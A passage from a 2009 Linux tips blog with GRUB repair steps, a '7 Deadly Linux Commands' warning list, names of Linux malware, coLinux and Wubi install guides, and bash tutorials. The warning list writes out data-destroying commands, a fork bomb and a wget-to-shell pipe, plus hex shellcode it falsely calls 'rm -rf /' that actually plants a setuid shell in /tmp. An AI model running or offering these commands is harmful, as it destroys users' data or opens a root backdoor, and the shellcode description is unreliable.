Partition num: 5, Filesystem type is fat, partition type 0xb

Partition num: 6, Filesystem type is fat, partition type 0xb

Partition num: 7, Filesystem type unknown, partition type 0�82

The one were interested in is 2 with the ext2fs ... this is the one with the linux installed to

so we type

root(hd0,2)

*caution*

Providing hd0 is the main physical partition it could be hd1 remember!!

Ok so after you have typed root(hd0,2)

Now you need to type:

setup (hd0)

Close terminal exit live cd and reboot...you should have your grub loader repaired

REMEMBER this is for Linux repair... NOT... windows you need to reset MBR if you deleted linux partition and getting a grub loading error message.

Saturday, December 12, 2009

7 Deadly Linux Commands

1. Code:

   rm -rf /

This command will recursively and forcefully delete all the files inside the root directory.

2. Code: 

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

This is the hex version of [rm -rf /] that can deceive even the rather experienced Linux users.

3. Code:
mkfs.ext3 /dev/sda

This will reformat or wipeout all the files of the device that is mentioned after the mkfs command.

4. Code:

:(){:|:&};:

Known as forkbomb, this command will tell your system to execute a huge number of processes until the system freezes. This can often lead to corruption of data.

5. Code:

any_command > /dev/sda

With this command, raw data will be written to a block device that can usually clobber the filesystem resulting in total loss of data.

6. Code:

wget http://some_untrusted_source -O- | sh

Never download from untrusted sources, and then execute the possibly malicious codes that they are giving you.

7. Code:

mv /home/yourhomedirectory/* /dev/null

This command will move all the files inside your home directory to a place that doesn't exist; hence you will never ever see those files again.
There are of course other equally deadly Linux commands that I fail to include here, so if you have something to add, please share it with us via comment.

Linux Viruses

“So till now, if you were thinking that your linux distro is immune to virus, its time to think again.”

Studies have proven that linux also can be affected by virus although it’s somewhat rare.So better be prepared with the antivirus.

For The Antiviruses Application, there’s some popular antivirus such as the open source Clam AV and the commercial freeware Avast! and AVG are available for Linux. For Clam AV , you download it at the repositories if you’re using ubuntu, but Avast! and AVG must downloaded from the antivirus site.

This is a list of a known viruses or trojans at Linux Currently:

Trojans

* Kaiten – Linux.Backdoor.Kaiten trojan horse
* Rexob – Linux.Backdoor.Rexob trojan

Viruses

* Alaeda – Virus.Linux.Alaeda
* Bad Bunny – Perl.Badbunny
* Binom – Linux/Binom
* Bliss
* Brundle[9]
* Bukowski[10]
* Diesel – Virus.Linux.Diesel.962
* Kagob a – Virus.Linux.Kagob.a
* Kagob b – Virus.Linux.Kagob.b
* MetaPHOR (also known as Simile)
* Nuxbee – Virus.Linux.Nuxbee.1403
* OSF.8759
* Podloso – Linux.Podloso (The iPod virus)
* Rike – Virus.Linux.Rike.1627
* RST – Virus.Linux.RST.a
* Satyr – Virus.Linux.Satyr.a
* Staog
* Vit – Virus.Linux.Vit.4096
* Winter – Virus.Linux.Winter.341
* Winux (also known as Lindose and PEElf
* ZipWorm – Virus.Linux.ZipWorm

Worms

* Adm – Net-Worm.Linux.Adm
* Adore
* Cheese – Net-Worm.Linux.Cheese
* Devnull
* Kork
* Linux/Lion (also known as Ramen)
* Mighty – Net-Worm.Linux.Mighty
* Millen – Linux.Millen.Worm
* Slapper
* SSH Bruteforce

Thursday, December 10, 2009

Topics for Linux admin Job

 

If you are preparing for interviews for linux admin jobs you should be familiar with below concepts.

1) Port number of different servers {cat /etc/services}

2) Linux Installation(through FTP,HTTP,NFS)

3) Boot process

4) Diff b/w ext3 and ext2

5) RAID LEVELS and Selection of raid

6) backup methods

7) Package management such as Yum server

8) Kernel Tuning

9) IPTABLES

10) TCP WRAPPERS

11) DIFFERENT RUN LEVELS

12) USER AND GROUP MANAGEMENT

13) QUOTA SETTING(user and group)

14) DIFF B/W CRON AND AT

15) BASIC SHELL SCRIPTING

16) Troubleshooting different issues.

17) Tell me why we should hire you?

18) DAILY ACTIVITES IN YOUR CURRENT COMPANY

19) RECENTLY SOLVED CRITICAL ISSUE

20) LVM (Very Imp)

21) vertias Volume manager

22) cluster basic like HAD , GAB , LLT , HEARTBEAT , CONFIGFILES ,RESOURSE , SERVICE GROUPS etc

23 ) kernel panic troubleshooting

24) Process management

25)Configuration part of NFS , NIS , Samba , DHCP , DNS,Apache, Sendmail etc.

26)Remote administration experience.

And many more depending on your job profile. You should know each topics what you mentioned in your resume . If you are not sure about anything , don’t mention in your resume and your resume should reflect your skills.

Wednesday, December 9, 2009

Linux on Windows: Part-2 (Colinux)

 

clip_image002

Cooperative Linux is the first working free and open source method for optimally running Linux on Microsoft Windows natively. More generally, Cooperative Linux (short-named coLinux) is a port of the Linux kernel that allows it to run cooperatively alongside another operating system on a single machine. For instance, it allows one to freely run Linux on Windows 2000/XP/Vista/7, without using commercial PC virtualization software such as VMware, in a way which is much more optimal than using any general purpose PC virtualization software. In its current condition, it allows us to run the KNOPPIX Japanese Edition on Windows.

Step by Step Guide to install and configure Colinux on your PC:

In this post i will be explaining how to download, install and configure CoLinux with Debian 4.0 file system image. It can be seen as an alternative to a conventional "dual boot" configuration - but with both systems running at the same time.

NOTE: This is a really long post, continue only if you can spare some time on it. smile_wink

Download and installation

You can download the latest version of CoLinux binary from the following link:

http://sourceforge.net/projects/colinux/files/coLinux-stable/

I will be using the stable version 0.7.3 (kernel 2.6.22.18).

Here you can find some file system images, go for the image which u feel comfortable with:

http://sourceforge.net/projects/colinux/files/

Screenshots of installation steps:

 

clip_image004

clip_image006

During the installation the WinPcap (The Windows Packet Capture Library) is installed.

clip_image008

We can download (some of) available filesystem images directly during the installation:

clip_image010

TAP network adapter is installed (If any hardware installation error comes, click on “continue anyway”;-)

clip_image012

Now the TAP adapter is installed (but not connected):

clip_image014

We have to configure the private IP address of the host system (windows):

clip_image016

Installation paths:

CoLinux binary: c:\programs\coLinux

Filesystem images: c:\programs\coLinux\images

Configure (Windows side:

Config file :

We create a new configuration file (just modify the installed example.conf):

C:\> cd programs\coLinux

C:\programs\coLinux> copy example.conf debian.conf

1 file(s) copied.

C:\programs\coLinux> notepad debian.conf

Now we can specify root image, swap file and possibly other mount points and also define two ethernet devices - one for pcap bridge and second for TAP adapter:

...

# File contains the root file system.

# Download and extract preconfigured file from SF "Images for 2.6".

cobd0="C:\programs\coLinux\images\Debian-4.0r0-etch.ext3.1gb"

cofs1=c:\

cofs2=d:\

# Swap device, should be an empty file with 128..512MB.

cobd1="C:\programs\coLinux\images\swap_file.1gb"

# Tell kernel the name of root device (mostly /dev/cobd0,

# /dev/cobd/0 on Gentoo)

# This parameter will be forward to Linux kernel.

root=/dev/cobd0

# Additional kernel parameters (ro = rootfs mount read only)

ro

# Initrd installs modules into the root file system.

# Need only on first boot.

initrd=initrd.gz

# Maximal memory for linux guest

#mem=64

# Slirp for internet connection (outgoing)

# Inside running coLinux configure eth0 with this static settings:

# ipaddress 10.0.2.15 broadcast 10.0.2.255 netmask 255.255.255.0

# gateway 10.0.2.2 nameserver 10.0.2.3

#eth0=slirp

# pcap bridge for internet connection (outgoing)

eth0=pcap-bridge,"Local Area Connection",<an-artificial-mac-address>

# Tuntap as private network between guest and host on second linux device

eth1=tuntap

# Setup for serial device

#ttys0=COM1,"BAUD=115200 PARITY=n DATA=8 STOP=1 dtr=on rts=on"

# Run an application on colinux start (Sample Xming, a Xserver)

# exec0=C:\Programs\Xming\Xming.exe,":0 -clipboard -multiwindow -ac"

Swap file :

Also you have to create a swap file, http://colinux.wikia.com/wiki/HowtoCreateSwapFile is how to create it, or if you are lazy like me, you can download one from http://gniarf.nerim.net/colinux/swap/

Configure (Linux side):

Start colinux daemon:

C:\programs\coLinux> colinux-daemon.exe @debian.conf

Cooperative Linux Daemon, 0.7.3

Daemon compiled on Sat May 24 22:36:07 2008

PID: 3268

error 0x2 in execution

error launching console

daemon: exit code 8200c401

daemon: error - CO_RC_ERROR_ERROR, line 49, file src/colinux/os/winnt/user/exec.c (16)

We did not install the generic console so we have to explicitly say we want to launch the NT console:

C:\programs\coLinux> colinux-daemon.exe -t nt @debian.conf

Login as root (a default password is "root"):

login as: root

root@10.0.2.2's password:

Linux debian 2.6.22.18-co-0.7.3 #1 PREEMPT Sat May 24 22:27:30 UTC 2008 i686

The programs included with the Debian GNU/Linux system are free software;

the exact distribution terms for each program are described in the

individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent

permitted by applicable law.

Change the root password

deb# passwd

Enter new UNIX password:

Retype new UNIX password:

passwd: password updated successfully

Network

For easy to use the network is pre-configured for "slirp":

deb# ifconfig

eth0 Link encap:Ethernet HWaddr 22:01:76:23:42:12

inet addr:10.0.2.15 Bcast:10.0.2.255 Mask:255.255.255.0

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:59 errors:0 dropped:0 overruns:0 frame:0

TX packets:0 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:20682 (20.1 KiB) TX bytes:0 (0.0 b)

Interrupt:2

lo Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0

UP LOOPBACK RUNNING MTU:16436 Metric:1

RX packets:0 errors:0 dropped:0 overruns:0 frame:0

TX packets:0 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0

RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)

We change it to dual-ethernet mode (one for outside world connection and other for private network between guest and host system):

deb# nano /etc/network/interfaces

Comment out the following:

# The primary network interface (slirp)

auto eth0

iface eth0 inet static

address 10.0.2.15

broadcast 10.0.2.255

netmask 255.255.255.0

gateway 10.0.2.2

And replace it with following:

# The primary network interface

auto eth0

iface eth0 inet dhcp

Then there is the following:

# Second network (tap-win32)

#auto eth1

#iface eth1 inet static

# address 192.168.0.40

# netmask 255.255.255.0

... leave it as is (or remove it) and add the following:

auto eth1

iface eth1 inet static

address 10.0.2.2

network 10.0.2.0

netmask 255.255.255.0

broadcast 10.0.2.255

Now save the file and reboot:

deb# reboot

We should see now on the Windows side that the TAP adapter is connected:

clip_image018

After we login to linux, we can examine the new network configuration:

deb# ifconfig

eth0 Link encap:Ethernet HWaddr <an-artificial-mac-address>

inet addr:192.168.1.196 Bcast:192.168.1.255 Mask:255.255.255.0

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:17220 errors:0 dropped:0 overruns:0 frame:0

TX packets:11031 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:24760203 (23.6 MiB) TX bytes:770417 (752.3 KiB)

Interrupt:2

eth1 Link encap:Ethernet HWaddr 00:FF:68:B7:70:00

inet addr:10.0.2.2 Bcast:10.0.2.255 Mask:255.255.255.0

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:17 errors:0 dropped:0 overruns:0 frame:0

TX packets:0 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:2238 (2.1 KiB) TX bytes:0 (0.0 b)

Interrupt:2

lo Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0

UP LOOPBACK RUNNING MTU:16436 Metric:1

RX packets:0 errors:0 dropped:0 overruns:0 frame:0

TX packets:0 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0

RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)

Packaging system

Now (we are connected to the internet) it is time to update the package system and upgrade installed packages:

deb# apt-get update

...

deb# apt-get upgrade

The following packages will be upgraded:

bsdutils cpio debconf debconf-i18n debian-archive-keyring dpkg e2fslibs

e2fsprogs findutils initscripts libblkid1 libc6 libcomerr2 libgnutls13

libpam-modules libpam-runtime libpam0g libss2 libuuid1 lsb-base mount nano

perl-base sysv-rc sysvinit sysvinit-utils tar tzdata util-linux

29 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.

Need to get 12.3MB of archives.

After unpacking 1786kB disk space will be freed.

Do you want to continue [Y/n]? Y

...

Mount table

Now we can modify the mount table:

deb# nano /etc/fstab

... add the following if you want to mount C: and D: windows drives (we made it available as cofs devices in debian.conf file):

cofs1 /mnt/c cofs defaults,noatime 0 0

cofs2 /mnt/d cofs defaults,noatime 0 0

Now the command:

deb# mount –a

... works as expected.

 

Now go and try it yourself  smile_nerd

Linux on windows part –1 (Wubi)

 

From the time i started using Linux, i was using it only on the Virtualization software mostly on VMware Workstation/player. Few days before i thought of going for an other alternative other than the VMware workstation ( its not that i don't like VMware workstation but just for exploration), as i already have some experience using Microsoft's Virtual PC and Sun micro system’s Virtual box I started my journey in a different way. After 1 day of exploration (using Google) and few hours of experimentation I finally succeeded in using running Linux without using any virtualization software.

The two solutions that i got for running Linux without using virtualization software are:

1) Colinux (Co-operative Linux).

2) Wubi (Windows-based Ubuntu Installer)

So in this post I’ll be explaining how to use them on ur PC. Starting with the later, coz it’s more easier in installation among these two.

clip_image001

Wubi (Windows-based Ubuntu Installer) is an official Windows-based free software installer for Ubuntu. Wubi can bring you to the Linux world with a single click. Wubi allows you to install and uninstall Ubuntu as any other Windows application, in a simple and safe way. Are you curious about Linux and Ubuntu?

You can download the latest version of Wubi from either of the following links:

http://wubi-installer.org/latest.php

(or)

http://www.softpedia.com/progDownload/Wubi-Download-79148.html

For installation you have to do nothing special, just double click the installer and select the place where you want to install Ubuntu and provide username and password and that’s it within few minutes you will be ready to use Ubuntu.

Features of Wubi:

1) Wubi is Safe

Wubi does not require you to modify the partitions of your PC, or to use a different boot loader.

2) Wubi is Simple

Just run the installer, no need to burn a CD.

3) Wubi is Discrete

Wubi keeps most of the files in one folder, and If you do not like, you can simply uninstall it.

4) Wubi is Free

Wubi (like Ubuntu) is free as in beer and as in freedom. You will get this part later on, the important thing now is that it cost absolutely nothing, it is our gift to you...

5) What flavor of Ubuntu will I get?

Most flavors, including Ubuntu (default, with GNOME), Kubuntu (with KDE), Xubuntu (with XFCE for older computers), Edubuntu (good for schools and younger users) and UbuntuStudio (for multimedia workstations).

6) What is the difference among the different Ubuntu flavors?

Mostly the graphical user interface is different, and the bundled applications may change so that they better integrate with the installed interface. More information can be found at the homepages for GNOME, KDE, and XFCE.

7) Can I install multiple flavors?

You can select the desktop environment within Wubi. But since each desktop environment is also available as an application package, it is recommended to install Ubuntu (default option) and from there install the other desktop environments. When you login you can choose the desktop environment to use.

8) What applications come with Ubuntu?

Ubuntu comes fully loaded with most commonly used applications, including a full office suite compatible with MS office, image editing software, picture management software, media player, games, browser, email client, IM and video conferencing software... On top of all of this, you can easily install additional software, from a list of over 20,000 applications.

Screenshots:

Screenshot showing starting of the installation:

clip_image002

Screenshot showing end of the installation:

clip_image005

Requirements:

· 256 MB RAM

· 1 GHz or faster Intel/AMD processor

· A minimum of 4GB disk space

Source : http://wubi-installer.org/

 

That’s all Buddies… in the next post i’ll be explaining about Colinux smile_wink

Tuesday, December 8, 2009

Super Grub Disk

 

A bootable floppy or CDROM that is oriented towards system rescue.
Super Grub Disk is a bootable floppy or CDROM that is oriented towards system rescue, specifically for repairing the booting process.
Super Grub Disk is simply a Grub Disk with a lot of useful menus.
It can activate partitions, boot partitions, boot MBRs, boot your former OS (Linux or another one) by loading menu.lst from your hard disk, automatically restore Grub on your MBR, swap hard disks in the BIOS, and boot from any available disk device.
Super Grub Disk project has multi-language support, and allows you to change the keyboard layout of your shell.

You can download the super grub disk from here:

grub-rescue-cdrom.iso

super_grub_disk_0.9798.iso

Monday, December 7, 2009

Open source Virtualization

OS Virtualization

Make your bash scripts user friendly using – dialog

 

If you have installed Linux using the text installer, then you will find a neat professional looking install process. You can rest assured that no extreme programming has gone into creating the text installer. In fact, it has been created using a utility called dialog. Dialog is a utility installed by default on all major Linux distributions. It is used to create professional looking dialog boxes from within shell scripts.

Some of the dialogs supported are Input boxes, Menu, checklist boxes, yes/no boxes, message boxes, radio list boxes and text boxes.

Creating a dialog is very easy. Here I will explain how to create dialog boxes of different types.

[Note: First of all check whether the dialog package has been installed in your machine or not.

Type: rpm –qa dialog*

If you find that the package is not installed then install it manually using commands,

depending on ur convenience and the type of your distribution.

rpm –ivh dialog* (incase you have dialog rpm file in your machine)

Or

yum install dialog*

Or

apt –get install dialog* ]

Input boxes: These allow the user to enter a string. After the user enters the data, it is written to standard error. You may also redirect the output to a file.

$ dialog --title "Ravi's Input Box"

--inputbox "Enter the parameters..." 8 40

As you can see, the options are self explanatory. The last two options 8 and 40 are the height and width of the box respectively.

clip_image001

Fig: Inputbox

Textbox: This is a box which takes a file as the parameter and shows the file in a scrollable box.

$ dialog --title "textbox" --textbox ./myfile.txt 22 70

... it shows the file myfile.txt in a textbox.

clip_image002

Fig: Textbox showing the file.

Checklist: The user is presented with a list of choices and can toggle each one on or off individually using the space bar.

$ dialog --checklist "Choose your favorite distribution:"

10 40 3

1 RedHat on

2 "Ubuntu Linux" off

3 Slackware off

... here, 10 is the height of the box, 40 - width, 3 is the number of choices, and the rest are the choices numbered 1,2 and 3.

Radio list: It displays a list containing radio buttons. And the user can only choose one option from the set of options.

$ dialog --backtitle "Processor Selection"

--radiolist "Select Processor type:"

10 40 4

1 Pentium off

2 Athlon on

3 Celeron off

4 Cyrix off

10 and 40 are the height and width respectively. 4 denotes the number of items in the list.

Infobox: This is useful for displaying a message while an operation is going on. For example, see the code below:

$ dialog --title "Memory Results"

--infobox "`echo ;vmstat;echo ;echo ;free`"

15 85

clip_image003

Fig: Information box - listing the vmstat and free listing.

clip_image004

Fig: Message box

Dialog is usually used inside a script which gives the script a degree of user friendliness. There is another package called Xdialog which gives the same features for scripts executed in X Windows. Xdialog utility also has additional functionality not found in the dialog utility.

To know more about the dialog utility check the man page of dialog.

Quick editing of a command in Bash

Sometimes when you try to execute a long command, it scrolls beyond the screen. Then if you want to modify the command and re-execute it, there is an easy way for it. Just type "fc" which will load the command in your default editor; in my case vi. Now you can modify the command in the editor and exit the editor, and your modified command is executed automatically.

For example try typing the following command in the bash shell and type "fc".

$ find /etc -iname '*.conf' -exec grep -H 'log' {} \;

$ fc

"fc" will bring the last command typed into an editor, "vi" if that's the default editor. Of course you can specify a different editor by using the -e switch as follows:

$ fc -e emacs

To list last few commands, type:

$ fc -l

For the last 10 commands it will be:

$ fc -l -10

To search for a command, type "CTRL+r" at the shell prompt for starting a search as you type prompt. Once you found your command, press enter to execute it.

If you want to transpose two characters say you typed 'sl' instead of 'ls'. Then move the cursor between 'sl' and type "CTRL+t".

Sunday, December 6, 2009

Bash Shell Shortcuts

Bash, which is the default shell in Linux contains a whole lot of key bindings which makes it really easy to use. The most commonly used shortcuts are listed below:

____________CTRL Key Bound_____________

Ctrl + a - Jump to the start of the line

Ctrl + b - Move back a char

Ctrl + c - Terminate the command

Ctrl + d - Delete from under the cursor

Ctrl + e - Jump to the end of the line

Ctrl + f - Move forward a char

Ctrl + k - Delete to EOL

Ctrl + l - Clear the screen

Ctrl + r - Search the history backwards

Ctrl + R - Search the history backwards with multi occurrence

Ctrl + u - Delete backward from cursor

Ctrl + xx - Move between EOL and current cursor position

Ctrl + x @ - Show possible hostname completions

Ctrl + z - Suspend/ Stop the command

____________ALT Key Bound___________

Alt + < - Move to the first line in the history

Alt + > - Move to the last line in the history

Alt + ? - Show current completion list

Alt + * - Insert all possible completions

Alt + / - Attempt to complete filename

Alt + . - Yank last argument to previous command

Alt + b - Move backward

Alt + c - Capitalize the word

Alt + d - Delete word

Alt + f - Move forward

Alt + l - Make word lowercase

Alt + n - Search the history forwards non-incremental

Alt + p - Search the history backwards non-incremental

Alt + r - Recall command

Alt + t - Move words around

Alt + u - Make word uppercase

Alt + back-space - Delete backward from cursor

----------------More Special Key bindings-------------------

Here "2T" means Press TAB twice

$ 2T - All available commands (common)

$ (string) 2T - All available commands starting with (string)

$ /2T - Entire directory structure including Hidden one

$ 2T - Only Sub Dirs inside including hidden one

$ *2T - Only Sub Dirs inside without Hidden one

$ ~2T - All Present Users on system from "/etc/passwd"

$ $2T - All Sys variables

$ @2T - Entries from "/etc/hosts"

$ =2T - Output like ls or dir

So now as u know the shortcuts, you can save loads of time by using them in your daily use.

10 Seconds Guide to Bash Shell Scripting

First let me clarify that this is not going to be a detailed study of shell scripting, but as the name of the post indicates, it will be a quick reference to the syntax used in scripting for the bash shell. So if you are expecting the former, then you should buy yourself a good book on shell scripting. ;-) So let's move on to the guide. Start your stop watch now.

-- Start of The 10 secs Guide to Bash Scripting --

Common environment variables

PATH - Sets the search path for any executable command. Similar to the PATH variable in MSDOS.

HOME - Home directory of the user.

MAIL - Contains the path to the location where mail addressed to the user is stored.

IFS - Contains a string of characters which are used as word separators in the command line. The string normally consists of the space, tab and the new line characters. To see them you will have to do an octal dump as follows:

$ echo $IFS | od -bc

PS1 and PS2 - Primary and secondary prompts in bash. PS1 is set to $ by default and PS2 is set to '>' . To see the secondary prompt, just run the command:

$ ls |

... and press enter.

USER - User login name.

TERM - indicates the terminal type being used. This should be set correctly for editors like vi to work correctly.

SHELL - Determines the type of shell that the user sees on logging in.

Note: To see what are the values held by the above environment variables, just do an echo of the name of the variable proceeded with a $. For example, if I do the following:

$ echo $USER

Deja vu

... I get the value stored in the environment variable USER.

Some bash shell scripting rules

1) The first line in your script must be

#!/bin/bash

... that is a # (Hash) followed by a ! (ban) followed by the path of the shell. This line lets the environment know the file is a shell script and the location of the shell.

2) Before executing your script, you should make the script executable. You do it by using the following command:

$ chmod ugo+x your_shell_script.sh

3) The name of your shell script must end with a .sh . This lets the user know that the file is a shell script. This is not compulsory but is the norm.

Conditional statements

The 'if' Statement - evaluates a condition which accompanies its command line. Those words marked in blue are compulsory. But those marked in red are optional.

syntax:

if condition_is_true

then

execute commands

else

execute commands

fi

if condition also permits multiway branching. That is you can evaluate more conditions if the previous condition fails.

if condition_is_true

then

execute commands

elif another_condition_is_true

then

execute commands

else

execute commands

fi

Example :

if grep "linuxhelp" thisfile.html

then

echo "Found the word in the file"

else

echo "Sorry no luck!"

fi

if's companion - test

test is an internal feature of the shell. test evaluates the condition placed on its right, and returns either a true or false exit status. For this purpose, test uses certain operators to evaluate the condition. They are as follows:

Relational operators

-eq Equal to

-lt Less than

-gt Greater than

-ge Greater than or equal to

-lt Less than

-le Less than or equal to

File related tests

-f file True if file exists and is a regular file

-r file True if file exists and is readable

-w file True if file exists and is writable

-x file True if file exists and is executable

-d file True if file exists and is a directory

-s file True if file exists and has a size greater

than zero.

String tests

-n str True if string str is not a null string

-z str True if string str is a null string

str1 == str2 True if both strings are equal

str1 != str2 True if both strings are unequal

str True if string str is assigned a value

and is not null.

Test also permits the checking of more than one expression in the same line.

-a Performs the AND function

-o Performs the OR function

Example:

test $d -eq 25 ; echo $d

... which means, if the value in the variable d is equal to 25, print the value.

test $s -lt 50; do_something

if [ $d -eq 25 ]

then

echo $d

fi

In the above example, I have used square brackets instead of the keyword test - which is another way of doing the same thing.

if [ $str1 == $str2 ]

then

do something

fi

if [ -n "$str1" -a -n "$str2" ]

then

echo 'Both $str1 and $str2 are not null'

fi

... above, I have checked if both strings are not null then execute the echo command.

Things to remember while using test

If you are using square brackets [] instead of test, then care should be taken to insert a space after the [ and before the ].

Note: test is confined to integer values only. Decimal values are simply truncated.

Do not use wildcards for testing string equality - they are expanded by the shell to match the files in your directory rather than the string.

Case statement

Case statement is the second conditional offered by the shell.

Syntax:

case expression in

pattern1) execute commands ;;

pattern2) execute commands ;;

...

esac

The keywords here are in, case and esac. The ';;' is used as option terminators. The construct also uses ')' to delimit the pattern from the action.

Example:

...

echo "Enter your option : "

read i;

case $i in

1) ls -l ;;

2) ps -aux ;;

3) date ;;

4) who ;;

5) exit

esac

Note: The last case option need not have ;; but you can provide them if you want.

Here is another example:

case `date |cut -d" " -f1` in

Mon) commands ;;

Tue) commands ;;

Wed) commands ;;

...

esac

Case can also match more than one pattern with each option.You can also use shell wild-cards for matching patterns.

...

echo "Do you wish to continue? (y/n)"

read ans

case $ans in

Y|y) ;;

[Yy][Ee][Ss]) ;;

N|n) exit ;;

[Nn][Oo]) exit ;;

*) echo "Invalid command"

esac

In the above case, if you enter YeS, YES,yEs and any of its combinations, it will be matched.

This brings us to the end of conditional statements.

Looping Statements

while loop

Syntax :

while condition_is_true

do

execute commands

done

Example:

while [ $num -gt 100 ]

do

sleep 5

done

while :

do

execute some commands

done

The above code implements a infinite loop. You could also write 'while true' instead of 'while :' .

Here I would like to introduce two keywords with respect to looping conditionals. They are break and continue.

break - This keyword causes control to break out of the loop.

continue - This keyword will suspend the execution of all statements following it and switches control to the top of the loop for the next iteration.

until loop

Until complements while construct in the sense that the loop body here is executed repeatedly as long as the condition remains false.

Syntax:

until false

do

execute commands

done

Example:

...

until [ -r myfile ]

do

sleep 5

done

The above code is executed repeatedly until the file myfile can be read.

for loop

Syntax :

for variable in list

do

execute commands

done

Example:

...

for x in 1 2 3 4 5

do

echo "The value of x is $x";

done

Here the list contains 5 numbers 1 to 5. Here is another example:

for var in $PATH $MAIL $HOME

do

echo $var

done

Suppose you have a directory full of java files and you want to compile those. You can write a script like this:

...

for file in *.java

do

javac $file

done

Note: You can use wildcard expressions in your scripts.

A few special symbols and their meanings w.r.t shell scripts

$* - This denotes all the parameters passed to the script

at the time of its execution. Which includes $1, $2

and so on.

$0 - Name of the shell script being executed.

$# - Number of arguments specified in the command line.

$? - Exit status of the last command.

The above symbols are known as positional parameters. Let me explain the positional parameters with the aid of an example. Suppose I have a shell script called my_script.sh . Now I execute this script in the command line as follows :

$ ./my_script.sh linux is a robust OS

... as you can see above, I have passed 5 parameters to the script. In this scenario, the values of the positional parameters are as follows:

$* - will contain the values 'linux','is','a','robust','OS'.

$0 - will contain the value my_script.sh - the name of the script being

executed.

$# - contains the value 5 - the total number of parameters.

$$ - contains the process ID of the current shell. You can use this parameter while giving unique names to any temporary files that you create at the time of execution of the shell.

$1 - contains the value 'linux'

$2 - contains the value 'is'

... and so on.

The set and shift statements

set - Lets you associate values with these positional parameters .

For example, try this:

$ set `date`

$ echo $1

$ echo $*

$ echo $#

$ echo $2

shift - transfers the contents of a positional parameter to its immediate lower numbered one. This goes on as many times it is called.

Example :

$ set `date`

$ echo $1 $2 $3

$ shift

$ echo $1 $2 $3

$ shift

$ echo $1 $2 $3

To see the process Id of the current shell, try this:

$ echo $$

2667

Validate that it is the same value by executing the following command:

$ ps -f |grep bash

read statement

Make your shell script interactive. read will let the user enter values while the script is being executed. When a program encounters the read statement, the program pauses at that point. Input entered through the keyboard id read into the variables following read, and the program execution continues.

Eg:

#!/bin/sh

echo "Enter your name : "

read name

echo "Hello $name , Have a nice day."

Exit status of the last command

Every command returns a value after execution. This value is called the exit status or return value of the command. A command is said to be true if it executes successfully, and false if it fails. This can be checked in the script using the $? positional parameter.

Here I have given a concise introduction to the art of bash shell scripting in Linux. But there is more to shell scripting than what I have covered. For one, there are different kinds of shells, bash shell being only one of them. And each shell has a small variation in its syntax. Like the C shell for example, which uses a syntax close to the C language for scripting. But what I have covered above applies to all the shells.

-- End of The 10 secs Guide to Bash Scripting --

Now check how much time you have taken to cover this much.

 

Hope this tutorial was informative for  u all :)

 
Things You Should Know About Linux !!!